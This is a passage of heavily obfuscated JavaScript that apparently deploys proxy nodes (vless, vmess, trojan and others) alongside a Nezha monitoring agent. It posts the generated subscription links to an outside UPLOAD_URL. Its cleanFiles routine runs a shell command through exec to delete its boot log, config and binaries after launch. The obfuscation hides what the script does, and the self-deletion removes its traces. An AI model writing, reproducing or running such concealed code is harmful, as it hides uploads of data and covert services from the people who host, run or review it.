7:0x51f,_0x4543e2:0x452,_0x2fffa2:0x4ef,_0x400f45:0x68e,_0x3c2964:0x571,_0x2ec7a8:0x56e,_0x14576f:0x5eb,_0x53314d:0x50f,_0x195a08:0x619,_0x24ac13:0x1ac,_0x404eec:0x28d,_0x4b38d3:0x690,_0x3a791e:0x65e,_0x168479:0x785,_0xb86f17:0x6a1,_0x416788:0x7a4,_0x17a9ef:0x709,_0x15f6c8:0x610,_0x518c16:0x44b,_0x38096c:0x3f2,_0x2e3868:0x2e6,_0x226c53:0x213,_0xbc7817:0x298,_0x5ce41f:0x286,_0x1582ce:0x68e,_0x1a72cc:0x56c,_0x4f956a:0x62e,_0x4a2d9c:0x7a2,_0x5a540c:0x16d,_0x38d36b:0x27e,_0x42a2ff:0x193,_0x280f03:0x187,_0x3a8ea0:0x1bb,_0x1a759b:0x652,_0x18f45f:0x535,_0x4f3f3e:0x607,_0x1b4ce3:0x364,_0x40b2a0:0x3ee,_0x45af12:0x68c,_0xe9e0b7:0x63d,_0x50a38a:0x629,_0x35d38f:0x68c,_0x474b30:0x64a,_0x329420:0x69f,_0x98f51a:0x632,_0x1bcfd4:0x5ba,_0x4b3676:0x753,_0x26b297:0x431,_0x3b1f4b:0x320,_0x1b43d5:0x683,_0x7f7a07:0x5b0,_0x13787f:0x2a1,_0x4575a4:0x207,_0x44bc18:0x2af,_0x22cfcb:0x43f,_0x36fa70:0x2cb,_0x2b685d:0x2ed,_0x4c7943:0x537,_0x3d59f6:0x592,_0x1d3e74:0x618,_0xada376:0x4aa,_0x242faa:0x71e,_0x3998f6:0x5f6,_0x158832:0x58a,_0x5ad1c6:0x5ad,_0xc5796b:0x67b,_0x55491a:0x52a,_0x54f740:0x20a,_0x317a42:0x386,_0x562a47:0x201,_0x5603f7:0x324,_0x193ad1:0x2a2,_0x29bc82:0x542,_0x5f276c:0x401,_0x479cf1:0x2d5,_0x4b09f5:0x483,_0x5065a3:0x365,_0xb76f5b:0x137,_0xf88e88:0x1a6,_0x3998df:0x2be,_0x3351e8:0x222,_0x35c618:0x1ab,_0x358527:0x28b},_0xfb3552={_0x529f97:0xbf,_0x55030f:0x1ce,_0x566c72:0xef},_0x20d169={_0x366664:0x4d4,_0x43e483:0x197,_0x2057c6:0x31},_0x3b4084={'lHQCF':'auto','rQpwJ':_0xabaf1c(_0x27df08._0x399ab1,_0x27df08._0x4d1387,_0x27df08._0x4976a6,_0x27df08._0x2f54d9),'SMHBR':_0x507c23(_0x27df08._0x3cb7d1,0x595,_0x27df08._0x1810aa,_0x27df08._0x405efe),'cvgIN':_0xabaf1c(0x17d,_0x27df08._0x4c2ba5,_0x27df08._0x128066,_0x27df08._0xa6a7b8),'WkrLj':_0x507c23(_0x27df08._0x5bf810,_0x27df08._0x5cfc07,_0x27df08._0x4ad547,_0x27df08._0x17e1a1),'MLuNE':function(_0x2fc96a){return _0x2fc96a();},'ONbOS':function(_0x1bbbd0,_0x579754){return _0x1bbbd0(_0x579754);},'ahDxw':function(_0x14a4d2,_0x33d75c){return _0x14a4d2||_0x33d75c;},'dlPqX':_0xabaf1c(_0x27df08._0x8150d7,_0x27df08._0x3106bc,_0x27df08._0x3f8405,_0x27df08._0x3bf694),'YlcNA':_0x507c23(0x516,_0x27df08._0x43ecf9,_0x27df08._0x1147a1,_0x27df08._0x50dabe),'Uzqaw':'tunnel.json','swlUX':_0xabaf1c(_0x27df08._0x57b860,_0x27df08._0x23b8de,_0x27df08._0x2702e5,_0x27df08._0x1d64a5),'ArEyh':function(_0x443173,_0xdadbcc){return _0x443173*_0xdadbcc;},'FwwkR':function(_0x416346,_0xf0f911){return _0x416346&&_0xf0f911;},'EGJok':_0x507c23(_0x27df08._0x38fa09,_0x27df08._0x2d6722,0x627,_0x27df08._0x3c479d),'NbLOs':function(_0x361d75,_0x2ce19f){return _0x361d75===_0x2ce19f;},'Vummr':_0xabaf1c(0x340,_0x27df08._0x14fdf0,_0x27df08._0x1cc569,_0x27df08._0x496729),'tUmbZ':'umlni','lLtmb':function(_0x531f26,_0x146019){return _0x531f26!==_0x146019;},'aZJoW':_0xabaf1c(_0x27df08._0x54bbb,_0x27df08._0x4c3080,_0x27df08._0x218668,0x298),'GAktW':function(_0x4c316c,_0x2afe35){return _0x4c316c===_0x2afe35;},'CMTTC':_0xabaf1c(_0x27df08._0x1ec252,0xcc,_0x27df08._0x1f3944,0x1db),'rSkrE':'utf-8','YDSDB':function(_0x3258a0,_0x21a110){return _0x3258a0!==_0x21a110;},'TDTRT':_0x507c23(_0x27df08._0x53e66f,_0x27df08._0x4bf32b,0x532,_0x27df08._0x26564a),'tGJOP':_0xabaf1c(_0x27df08._0x53dec0,_0x27df08._0x97e90c,_0x27df08._0x42e9e5,0x2a5),'gYalg':_0xabaf1c(0x39f,_0x27df08._0x3c72d9,_0x27df08._0xb7d069,_0x27df08._0x2cc8c7)};function _0x507c23(_0x2f410f,_0x1d9fcf,_0xdd552e,_0x3eb439){return _0x5d6c89(_0x2f410f-_0x20d169._0x366664,_0x1d9fcf-_0x20d169._0x43e483,_0xdd552e-_0x20d169._0x2057c6,_0x1d9fcf);}function _0xabaf1c(_0x5293c6,_0x5f0943,_0x4dd2fb,_0xd6f2be){return _0x477c8c(_0x5293c6-_0xfb3552._0x529f97,_0x5f0943-_0xfb3552._0x55030f,_0x5293c6,_0xd6f2be- -_0xfb3552._0x566c72);}if(_0x3b4084['FwwkR'](UPLOAD_URL,PROJECT_URL)){const _0x584d94=PROJECT_URL+'/'+SUB_PATH,_0xa63559={};_0xa63559['subscription']=[_0x584d94];const _0x1c8b93=_0xa63559;try{const _0x540773={};_0x540773[_0xabaf1c(_0x27df08._0x1c8984,_0x27df08._0x39ceda,0x149,0x24b)]=_0x3b4084[_0xabaf1c(_0x27df08._0x33b922,_0x27df08._0x4f9283,0x1a0,_0x27df08._0xe7595f)];const _0x26b6e3={};_0x26b6e3[_0x507c23(_0x27df08._0x4583b0,_0x27df08._0x306dd2,0x45d,_0x27df08._0x4451fd)]=_0x540773;const _0x3d50c8=await axios[_0xabaf1c(0x381,_0x27df08._0x5cd519,0x285,_0x27df08._0x5dfe39)](UPLOAD_URL+_0xabaf1c(_0x27df08._0x3178f2,_0x27df08._0xd756e,_0x27df08._0x4976a6,_0x27df08._0x2d9ff2),_0x1c8b93,_0x26b6e3);if(_0x3d50c8&&_0x3b4084['NbLOs'](_0x3d50c8[_0xabaf1c(0x211,_0x27df08._0x4f0e3e,_0x27df08._0x4126c6,_0x27df08._0x140791)],-0x38b*0x3+0x1cf3+-0x118a)){if(_0x3b4084['NbLOs'](_0x3b4084[_0x507c23(_0x27df08._0x3ac1c6,_0x27df08._0x23511f,_0x27df08._0x13e35a,_0x27df08._0x31f920)],_0x3b4084[_0xabaf1c(_0x27df08._0x327ed0,_0x27df08._0x47ca15,0x390,_0x27df08._0x4f9283)])){const _0x535586={};_0x535586['v']='2',_0x535586['ps']=''+_0x35c117,_0x535586['add']=_0x83d53f,_0x535586['port']=_0x2b1c35,_0x535586['id']=_0x544db4,_0x535586[_0xabaf1c(_0x27df08._0x3d3be9,_0x27df08._0x2d169f,_0x27df08._0x34b4e0,_0x27df08._0x25bbd2)]='0',_0x535586[_0xabaf1c(_0x27df08._0x35b869,0x21f,0x138,_0x27df08._0x32408)]=_0x3b4084['lHQCF'],_0x535586[_0xabaf1c(_0x27df08._0x38264a,_0x27df08._0x96b024,0x1d2,_0x27df08._0x1b237c)]='ws',_0x535586['type']=_0x3b4084[_0x507c23(_0x27df08._0x44aba0,_0x27df08._0x48c874,_0x27df08._0x35f1e1,_0x27df08._0x231935)],_0x535586[_0x507c23(_0x27df08._0x3c4859,0x594,_0x27df08._0x87a0ca,_0x27df08._0x5d2aa8)]=_0x23f0ba,_0x535586['path']=_0x507c23(_0x27df08._0x3c9976,_0x27df08._0x4bfc8a,0x5f6,_0x27df08._0x5f1181),_0x535586['tls']=_0x3b4084[_0xabaf1c(0x2bd,_0x27df08._0x33448d,_0x27df08._0x7190b,_0x27df08._0x4b4742)],_0x535586[_0xabaf1c(_0x27df08._0xe55ac,0x152,_0x27df08._0x1d3269,_0x27df08._0x2e3217)]=_0x5f38de,_0x535586[_0x507c23(0x5dd,0x61c,_0x27df08._0x5b3c49,_0x27df08._0x58471f)]='',_0x535586['fp']=_0x3b4084[_0x507c23(_0x27df08._0x45e5fb,_0x27df08._0x3d867c,_0x27df08._0x2c1255,0x4a4)];const _0x5288eb=_0x535586,_0x24755a=_0xabaf1c(0x195,_0x27df08._0x185f22,_0x27df08._0x3be054,_0x27df08._0x4ba708)+_0x2eb5e4+'@'+_0x3c64e9+':'+_0x143198+_0xabaf1c(_0x27df08._0x166170,_0x27df08._0x3f8405,_0x27df08._0x5ec5b8,_0x27df08._0xa57d06)+_0xbad38c+_0x507c23(_0x27df08._0x40d86f,0x597,_0x27df08._0xc05eb9,0x3a2)+_0x1ec332+_0x507c23(0x4bf,0x4ed,_0x27df08._0x50f767,0x52f)+_0x4989b9+_0xabaf1c(_0x27df08._0x269c19,_0x27df08._0x4d40c5,_0x27df08._0x116b95,0x27a)+_0x3eee37['from'](_0x9e3c33[_0x507c23(0x484,_0x27df08._0x96fad0,_0x27df08._0x7f93fd,_0x27df08._0x34e936)](_0x5288eb))[_0x507c23(_0x27df08._0x370424,_0x27df08._0x379747,_0x27df08._0x4a3f6b,_0x27df08._0x1cbc27)](_0x3b4084[_0x507c23(_0x27df08._0x2ecf27,_0x27df08._0x4374ba,_0x27df08._0x30a131,_0x27df08._0x20c21c)])+_0xabaf1c(_0x27df08._0x1d06db,_0x27df08._0xe7595f,_0x27df08._0x578e46,_0x27df08._0x4f56f7)+_0x4a1d9c+'@'+_0x5023e4+':'+_0x4a01ab+_0xabaf1c(_0x27df08._0x3172d8,_0x27df08._0x35ab14,0x32b,_0x27df08._0x5e75c9)+_0x5b1012+_0x507c23(_0x27df08._0x40d86f,0x474,_0x27df08._0x21af94,0x3a5)+_0x11f524+_0x507c23(_0x27df08._0x1146a1,_0x27df08._0x498f98,_0x27df08._0x4bf3cf,_0x27df08._0x5bad17)+_0x10ce1a+_0xabaf1c(0x393,0x3c2,_0x27df08._0x1b9ac3,_0x27df08._0x272aa4);_0x37702d[_0x507c23(_0x27df08._0x562533,_0x27df08._0x2ecdc4,_0x27df08._0x5b129a,_0x27df08._0x1c8072)](_0x4debb2[_0xabaf1c(_0x27df08._0x1201ea,_0x27df08._0x2b6c0a,_0x27df08._0x53eef7,_0x27df08._0x1201ea)](_0x24755a)[_0x507c23(_0x27df08._0x3d71d3,_0x27df08._0x45dfc9,_0x27df08._0x4718a2,_0x27df08._0x3ccdf6)](_0x3b4084[_0xabaf1c(_0x27df08._0x3481be,_0x27df08._0x52d910,_0x27df08._0x5c74b6,0x1c6)])),_0xb0e502[_0x507c23(_0x27df08._0x223b7d,_0x27df08._0x2de39a,_0x27df08._0x2d5de1,_0x27df08._0x2a97d5)](_0xf5fe62,_0x2210f7['from'](_0x24755a)['toString'](_0x3b4084[_0xabaf1c(0x17a,0x118,_0x27df08._0x26fcb6,0x1c6)])),_0x3c6b45[_0x507c23(0x473,_0x27df08._0x332c9c,_0x27df08._0x43a50f,_0x27df08._0x2da4e0)](_0x38ba3a+_0xabaf1c(0x27d,_0x27df08._0x1859c3,_0x27df08._0x106845,_0x27df08._0x591e2a)),_0x10b63c=_0x18fa18['from'](_0x24755a)[_0xabaf1c(_0x27df08._0x2c50c8,_0x27df08._0x519831,0x15b,_0x27df08._0x8150d7)](_0x507c23(_0x27df08._0x5bf810,_0x27df08._0x148f5b,0x5c3,_0x27df08._0x22702b)),_0x3b4084['MLuNE'](_0x2124cd),_0x3b4084[_0xabaf1c(_0x27df08._0x4dffbd,_0x27df08._0xc5b49,_0x27df08._0x465c40,_0x27df08._0x19f5c7)](_0x4dccc0,_0x24755a);}else return console[_0xabaf1c(_0x27df08._0x40e5e6,0x261,_0x27df08._0x848ebc,0x187)](_0x507c23(_0x27df08._0x3e1ecb,_0x27df08._0x104ef1,_0x27df08._0x5698e6,_0x27df08._0x178849)),_0x3d50c8;}else return null;}catch(_0x204e14){if(_0x3b4084[_0x507c23(_0x27df08._0x2a3d8e,_0x27df08._0x309ca7,_0x27df08._0x2a4c52,0x5ee)](_0x507c23(_0x27df08._0x128928,_0x27df08._0x290b5b,_0x27df08._0x268a46,_0x27df08._0x3a2719),_0x3b4084[_0x507c23(_0x27df08._0xda306d,_0x27df08._0x47acad,0x6e7,_0x27df08._0x1d1682)])){if(_0x204e14[_0xabaf1c(_0x27df08._0x4827e0,_0x27df08._0x38c9f0,_0x27df08._0x417353,_0x27df08._0x399ad1)]){if(_0x3b4084[_0x507c23(_0x27df08._0xd3cbce,_0x27df08._0x404f92,_0x27df08._0x5cee08,_0x27df08._0x3a762b)](_0x204e14[_0xabaf1c(0x23f,0x340,_0x27df08._0x19a52f,0x316)][_0xabaf1c(_0x27df08._0x247ff1,_0x27df08._0x86496,_0x27df08._0x177acb,_0x27df08._0x41fa28)],0x1*-0xd89+-0xb*0x10d+0x1aa8)){}}}else{if(_0x3b4084[_0x507c23(_0x27df08._0x1e5f06,_0x27df08._0x3fd1f3,_0x27df08._0x3908f0,_0x27df08._0x88c85d)](!_0x379a28,!_0x4ebc12)){_0xe27f49[_0xabaf1c(_0x27df08._0x39bba,_0x27df08._0x4f07d1,_0x27df08._0xb9946d,0x187)](_0x3b4084[_0x507c23(_0x27df08._0x16ee5f,0x5b9,_0x27df08._0x296ae4,_0x27df08._0x192f64)]);return;}if(_0x4a8436['includes'](_0x3b4084[_0x507c23(_0x27df08._0x23272d,_0x27df08._0x3ebf1e,_0x27df08._0x189a5d,_0x27df08._0x4337a7)])){_0x7b6e1a[_0x507c23(0x572,0x44f,_0x27df08._0x4543e2,_0x27df08._0x2fffa2)](_0x45aec9[_0x507c23(_0x27df08._0x400f45,_0x27df08._0x3c2964,_0x27df08._0x2ec7a8,_0x27df08._0x14576f)](_0x122d44,_0x507c23(_0x27df08._0x53314d,0x48f,0x4a0,_0x27df08._0x195a08)),_0x26a985);const _0x2cce15=_0xabaf1c(_0x27df08._0x24ac13,0x260,0x33d,_0x27df08._0x404eec)+_0x127a66['split']('\x22')[-0xc53+-0x2029*-0x1+-0x233*0x9]+_0x507c23(_0x27df08._0x4b38d3,0x639,_0x27df08._0x3a791e,_0x27df08._0x168479)+_0x15bad4['join'](_0x325848,_0x3b4084['Uzqaw'])+_0x507c23(_0x27df08._0xb86f17,_0x27df08._0x416788,_0x27df08._0x17a9ef,_0x27df08._0x15f6c8)+_0x25f988+_0xabaf1c(_0x27df08._0x518c16,0x3c2,_0x27df08._0x38096c,0x336)+_0x4ab98a+_0xabaf1c(_0x27df08._0x2e3868,0x17f,0x317,_0x27df08._0x226c53);_0x3e0c24[_0xabaf1c(0x321,_0x27df08._0xbc7817,_0x27df08._0x2d9ff2,_0x27df08._0x5ce41f)](_0x518ba4[_0x507c23(_0x27df08._0x1582ce,_0x27df08._0x1a72cc,_0x27df08._0x4f956a,_0x27df08._0x4a2d9c)](_0x166640,_0x3b4084['swlUX']),_0x2cce15);}else _0x511dfb[_0xabaf1c(_0x27df08._0x5a540c,_0x27df08._0x38d36b,_0x27df08._0x42a2ff,_0x27df08._0x280f03)](_0xabaf1c(0x1a1,0x16d,_0x27df08._0x218668,_0x27df08._0x3a8ea0)+_0x34fd81+_0x507c23(0x615,_0x27df08._0x1a759b,_0x27df08._0x18f45f,_0x27df08._0x4f3f3e));}}}else{if(UPLOAD_URL){if(_0x3b4084[_0xabaf1c(_0x27df08._0x1b4ce3,0x342,_0x27df08._0x40b2a0,_0x27df08._0x4126c6)](_0x3b4084[_0x507c23(_0x27df08._0x45af12,_0x27df08._0xe9e0b7,0x5c3,_0x27df08._0x50a38a)],_0x3b4084[_0x507c23(_0x27df08._0x35d38f,0x71c,_0x27df08._0x474b30,_0x27df08._0x329420)])){if(!fs[_0x507c23(_0x27df08._0x98f51a,0x62b,_0x27df08._0x1bcfd4,_0x27df08._0x4b3676)](listPath))return;const _0x4c8f1f=fs[_0xabaf1c(_0x27df08._0x26b297,_0x27df08._0x3b1f4b,0x2ac,0x3b6)](listPath,_0x3b4084[_0x507c23(_0x27df08._0x43a50f,_0x27df08._0x1b43d5,0x4d1,_0x27df08._0x7f7a07)]),_0x3ab247=_0x4c8f1f['split']('\x0a')['filter'](_0x5aba2=>/(vless|vmess|trojan|hysteria2|tuic):\/\//[_0x507c23(0x4c6,0x481,0x5e5,0x58d)](_0x5aba2));if(_0x3ab247[_0xabaf1c(_0x27df08._0x4ba708,_0x27df08._0x13787f,_0x27df08._0x4575a4,_0x27df08._0x44bc18)]===-0x245e+0x9d7+0x1a87)return;const _0x385876={};_0x385876[_0xabaf1c(_0x27df08._0x22cfcb,_0x27df08._0x36fa70,_0x27df08._0x2b685d,0x38c)]=_0x3ab247;const _0x5804e9=JSON['stringify'](_0x385876);try{const _0x48a4c8={};_0x48a4c8[_0x507c23(_0x27df08._0x4c7943,_0x27df08._0x3d59f6,_0x27df08._0x1d3e74,_0x27df08._0xada376)]='application/json';const _0x1bc024={};_0x1bc024['headers']=_0x48a4c8;const _0x36b62e=await axios[_0x507c23(0x638,_0x27df08._0x242faa,0x628,_0x27df08._0x3998f6)](UPLOAD_URL+_0x507c23(_0x27df08._0x158832,_0x27df08._0x5ad1c6,_0x27df08._0xc5796b,_0x27df08._0x55491a),_0x5804e9,_0x1bc024);if(_0x36b62e&&_0x36b62e['status']===-0x1937*0x1+-0x201d+0x4*0xe87){if(_0x3b4084[_0xabaf1c(_0x27df08._0x54f740,0x21b,_0x27df08._0x317a42,0x2f3)](_0x3b4084['TDTRT'],_0x3b4084[_0xabaf1c(_0x27df08._0x562a47,0x318,_0x27df08._0x5603f7,_0x27df08._0x193ad1)]))return console[_0x507c23(0x473,0x429,_0x27df08._0x29bc82,_0x27df08._0x5f276c)](_0x3b4084[_0xabaf1c(_0x27df08._0x479cf1,0x28e,_0x27df08._0x4b09f5,_0x27df08._0x5065a3)]),_0x36b62e;else _0x191100+=_0x2ad0bf[_0xabaf1c(_0x27df08._0x578e46,_0x27df08._0xb76f5b,_0x27df08._0xf88e88,_0x27df08._0x34b4e0)](_0x868373['floor'](_0x3b4084[_0xabaf1c(0x271,0x204,0x182,0x1cb)](_0x2d9219[_0xabaf1c(_0x27df08._0x3998df,_0x27df08._0x3351e8,_0x27df08._0x35c618,_0x27df08._0x358527)](),_0xa8a168['length'])));}else return null;}catch(_0x5e288e){return null;}}else return null;}else return;}}function cleanFiles(){const _0x4aac58={_0x2f2083:0x208,_0x30341d:0x1c6},_0x7d25bd={_0x5c9d7f:0x5b,_0x2d6253:0x142,_0x3bcd7d:0x5e,_0x5cdf5f:0x1f4,_0x4f6904:0x167,_0x5eae9c:0x279,_0x1a30fc:0x1b3,_0x42293a:0x132,_0x81c59b:0xaa,_0x34f486:0x220,_0x131a18:0x321,_0x3307f7:0x20f,_0x320001:0x1a4,_0x4d719a:0x1f0,_0x54a392:0x1f3,_0x1a0149:0x12d,_0x1acc5f:0x26,_0x401efc:0x57,_0x4d8c8c:0x3,_0x3f53b7:0x1f,_0x40cc29:0x236,_0x30e10b:0x22f,_0x1d5104:0x2ec,_0x1eabd7:0x20c,_0x56a1f2:0x19f,_0x53c81c:0x2e0,_0x538d3b:0x354,_0x8b75ef:0x29,_0x1f7447:0xbd,_0x1e3598:0x6b,_0x2a2cd7:0x110,_0x2abfd9:0x32f,_0x326e83:0x2de,_0x5b2ecc:0x3cb,_0x265d6a:0x1cf,_0x4aa930:0x266,_0x1653ed:0x204,_0x558647:0x2ff,_0x3f4593:0x23d,_0x27adcb:0x215,_0x451d9c:0x91,_0x58a1e8:0x17,_0x405cf5:0x12e,_0x4b3585:0x210,_0x3b59b8:0xc9,_0xe448e6:0x39,_0x30e476:0xc5,_0x1eec2c:0xc7,_0x3015c4:0x3c6,_0x369eee:0x38a,_0x26c045:0x3e0,_0x255a1f:0x1d3,_0x13db66:0x145,_0x411d99:0x141,_0x9154dd:0x12b,_0x8c2a75:0x58,_0x69f73a:0xde,_0xbad7b4:0x27,_0x25cfd3:0x3f2,_0x520b9b:0x364,_0x540aa3:0x14b,_0x5ec02e:0x102,_0x1274b5:0xbf},_0x5390a7={_0x4ca26a:0x171,_0x4161f6:0x112,_0x29940a:0xb7,_0x99c1bc:0x114,_0x3f491f:0x1d5,_0xaa7fd3:0x10d,_0x48c048:0xa0,_0x368c3f:0x27c,_0x44acd4:0x20e,_0x3b6227:0x263,_0x562ac0:0x2da,_0x54b451:0x1a1,_0x176b05:0x1c8,_0x50fdb2:0x82,_0x226c1a:0x65,_0x4f6fc6:0x91,_0x28c0bf:0x1ad,_0x19deed:0x1ba,_0x41ff37:0x242,_0x3d9690:0x19e,_0x38c55e:0x33a,_0x4c9cd0:0x233,_0x3bf124:0x3bc,_0x5541fa:0x144,_0x41e68f:0x1a2,_0x215e13:0x257,_0x10528e:0x260,_0xc585b4:0x29e,_0x164e74:0x8,_0x1d3a40:0x3e,_0x4e60c3:0x50,_0x55114f:0x2b3,_0x53795f:0x30d,_0x120b99:0x3c3,_0x3ac3ea:0x2f7,_0x252e53:0x262,_0x187ce4:0x363,_0x304d6d:0x1cc,_0x1c3a16:0x2c2,_0x447c3b:0x226,_0x42708a:0x74,_0xff9b67:0xe5,_0x48c7ce:0x9a,_0x5f573f:0x79,_0x3236d8:0x275,_0x52ff90:0x35c,_0xd8c021:0x45f,_0x52c56a:0x2ac,_0x4b39fe:0x33b,_0x45d775:0x185,_0x3144f0:0x1bc,_0x42d116:0x190,_0x146442:0x26d,_0x1c0759:0x210},_0x51b613={_0x19344a:0x383,_0x3f6885:0x2ad,_0x24c5a4:0x1cf,_0x398c8a:0x1e1,_0x818c9e:0x25e,_0x415eca:0x26b,_0x2c34b0:0x146,_0x5b1a73:0xcd,_0x3eb7c7:0x3,_0xb5ee08:0xfa},_0x305c08={_0x2c07e1:0x32c,_0x1ec176:0x1ba},_0x6c5918={_0x14bcef:0x25,_0x2fa94e:0x1c3},_0x1f2e94={_0x51a00f:0x8d,_0x321567:0x19,_0x2b592f:0xa6};function _0xfd8ec9(_0x4838e4,_0x1515c7,_0xb7808,_0x4026f7){return _0x477c8c(_0x4838e4-_0x1f2e94._0x51a00f,_0x1515c7-_0x1f2e94._0x321567,_0xb7808,_0x4838e4- -_0x1f2e94._0x2b592f);}const _0x46ef9b={'fkNSh':function(_0x2487a7,_0x1812fb){return _0x2487a7===_0x1812fb;},'qcZvE':_0xfd8ec9(_0x4aac58._0x2f2083,0x26d,_0x4aac58._0x30341d,0x2af),'lqhao':'App\x20is\x20running','ZhwbI':'Thank\x20you\x20for\x20using\x20this\x20script,\x20enjoy!','aZjjk':'tunnel.json','fYVwu':'tunnel.yml','cKFLi':function(_0x4aec75,_0x41ca33){return _0x4aec75&&_0x41ca33;},'hiDEL':function(_0x1aee45,_0x243be6){return _0x1aee45!==_0x243be6;},'RIgAx':'EcIET','nRQcx':function(_0x444855,_0x22dbfc){return _0x444855===_0x22dbfc;},'RqCnV':'win32','gMreL':function(_0x4eea56,_0x274aa3,_0x3db394){return _0x4eea56(_0x274aa3,_0x3db394);},'CDqlJ':function(_0x2087ac,_0x57799b,_0x4b3e98){return _0x2087ac(_0x57799b,_0x4b3e98);}};_0x46ef9b['CDqlJ'](setTimeout,()=>{const _0x34e31f={_0x25174a:0x2,_0x2f3de7:0x51},_0x25cd45={_0x37fbb8:0xc4,_0xb64853:0x79,_0x12b050:0x1ed},_0xa33614={};_0xa33614[_0x1f21fe(_0x7d25bd._0x5c9d7f,-_0x7d25bd._0x2d6253,-0x5c,-_0x7d25bd._0x3bcd7d)]=_0x39bfcf(_0x7d25bd._0x5cdf5f,_0x7d25bd._0x4f6904,_0x7d25bd._0x5eae9c,0x1ce),_0xa33614[_0x39bfcf(_0x7d25bd._0x1a30fc,_0x7d25bd._0x42293a,0x2a6,_0x7d25bd._0x81c59b)]=_0x46ef9b[_0x39bfcf(_0x7d25bd._0x34f486,_0x7d25bd._0x131a18,_0x7d25bd._0x3307f7,_0x7d25bd._0x320001)];function _0x39bfcf(_0x36317c,_0x2f3444,_0x1eab81,_0x16b427){return _0xfd8ec9(_0x36317c- -_0x6c5918._0x14bcef,_0x2f3444-_0x6c5918._0x2fa94e,_0x2f3444,_0x16b427-0x1e9);}_0xa33614[_0x1f21fe(-_0x7d25bd._0x4d719a,-_0x7d25bd._0x54a392,-_0x7d25bd._0x1a0149,-_0x7d25bd._0x1acc5f)]=_0x46ef9b['aZjjk'],_0xa33614[_0x1f21fe(0xb5,-_0x7d25bd._0x401efc,-_0x7d25bd._0x4d8c8c,_0x7d25bd._0x3f53b7)]=_0x46ef9b[_0x39bfcf(_0x7d25bd._0x40cc29,_0x7d25bd._0x30e10b,0x162,_0x7d25bd._0x1d5104)];const _0x403f24=_0xa33614;function _0x1f21fe(_0x6ad977,_0x2dfce5,_0x17f106,_0xac1ecd){return _0xfd8ec9(_0x17f106- -_0x305c08._0x2c07e1,_0x2dfce5-0xba,_0x6ad977,_0xac1ecd-_0x305c08._0x1ec176);}const _0x3ba2e2=[bootLogPath,configPath,webPath,botPath];if(NEZHA_PORT)_0x3ba2e2[_0x1f21fe(-0x1c1,-_0x7d25bd._0x1eabd7,-0x146,-_0x7d25bd._0x56a1f2)](npmPath);else{if(_0x46ef9b[_0x39bfcf(_0x7d25bd._0x53c81c,_0x7d25bd._0x538d3b,0x371,_0x7d25bd._0x5eae9c)](NEZHA_SERVER,NEZHA_KEY)){if(_0x46ef9b[_0x1f21fe(_0x7d25bd._0x8b75ef,-_0x7d25bd._0x1f7447,-_0x7d25bd._0x1e3598,-_0x7d25bd._0x2a2cd7)]('EcIET',_0x46ef9b[_0x39bfcf(_0x7d25bd._0x2abfd9,0x404,_0x7d25bd._0x326e83,_0x7d25bd._0x5b2ecc)]))return null;else _0x3ba2e2['push'](phpPath);}}_0x46ef9b[_0x39bfcf(_0x7d25bd._0x265d6a,_0x7d25bd._0x4aa930,0x2ad,_0x7d25bd._0x1653ed)](process[_0x39bfcf(_0x7d25bd._0x558647,_0x7d25bd._0x3f4593,0x2ff,_0x7d25bd._0x27adcb)],_0x46ef9b[_0x1f21fe(-_0x7d25bd._0x451d9c,-0x5,-_0x7d25bd._0x58a1e8,-_0x7d25bd._0x405cf5)])?_0x46ef9b[_0x1f21fe(-0x209,-_0x7d25bd._0x4b3585,-0xeb,-0x149)](exec,_0x1f21fe(_0x7d25bd._0x3b59b8,-_0x7d25bd._0xe448e6,_0x7d25bd._0x30e476,_0x7d25bd._0x1eec2c)+_0x3ba2e2[_0x39bfcf(_0x7d25bd._0x3015c4,0x36f,_0x7d25bd._0x369eee,0x47d)]('\x20')+_0x39bfcf(_0x7d25bd._0x26c045,0x31a,0x37a,0x354),_0x5f94d5=>{const _0x5c3584={_0x3b5dee:0xab,_0xd1b3a3:0x185,_0x13587b:0x150};function _0x1db08f(_0x3e4721,_0x1179be,_0x2b6217,_0x20ca58){return _0x39bfcf(_0x2b6217- -_0x25cd45._0x37fbb8,_0x3e4721,_0x2b6217-_0x25cd45._0xb64853,_0x20ca58-_0x25cd45._0x12b050);}function _0xe66866(_0x148715,_0x26db30,_0x19e11d,_0x413319){return _0x1f21fe(_0x19e11d,_0x26db30-_0x5c3584._0x3b5dee,_0x148715- -_0x5c3584._0xd1b3a3,_0x413319-_0x5c3584._0x13587b);}console[_0xe66866(-0x2ed,-_0x51b613._0x19344a,-_0x51b613._0x3f6885,-_0x51b613._0x24c5a4)](),console['log'](_0x403f24[_0xe66866(-_0x51b613._0x398c8a,-_0x51b613._0x818c9e,-_0x51b613._0x415eca,-_0x51b613._0x2c34b0)]),console[_0x1db08f(_0x51b613._0x5b1a73,_0x51b613._0x3eb7c7,0xe7,_0x51b613._0xb5ee08)](_0x403f24[_0x1db08f(0x1f,0x15d,0xef,0xb4)]);}):_0x46ef9b[_0x39bfcf(_0x7d25bd._0x255a1f,0x18a,_0x7d25bd._0x13db66,_0x7d25bd._0x411d99)](exec,_0x1f21fe(_0x7d25bd._0x9154dd,_0x7d25bd._0x8c2a75,_0x7d25bd._0x69f73a,_0x7d25bd._0xbad7b4)+_0x3ba2e2[_0x39bfcf(_0x7d25bd._0x3015c4,0x314,_0x7d25bd._0x25cfd3,_0x7d25bd._0x520b9b)]('\x20')+_0x1f21fe(-_0x7d25bd._0x540aa3,-_0x7d25bd._0x5ec02e,-_0x7d25bd._0x1274b5,-0x26),_0x4c03f0=>{const _0x402d84={_0x5f2a5e:0x15f};function _0x5c32e0(_0x4c8665,_0x193384,_0x37a579,_0x2fcc75){return _0x39bfcf(_0x4c8665-_0x34e31f._0x25174a,_0x193384,_0x37a579-0x43,_0x2fcc75-_0x34e31f._0x2f3de7);}function _0x498bb7(_0x382c70,_0x567536,_0x599cdb,_0x52dd16){return 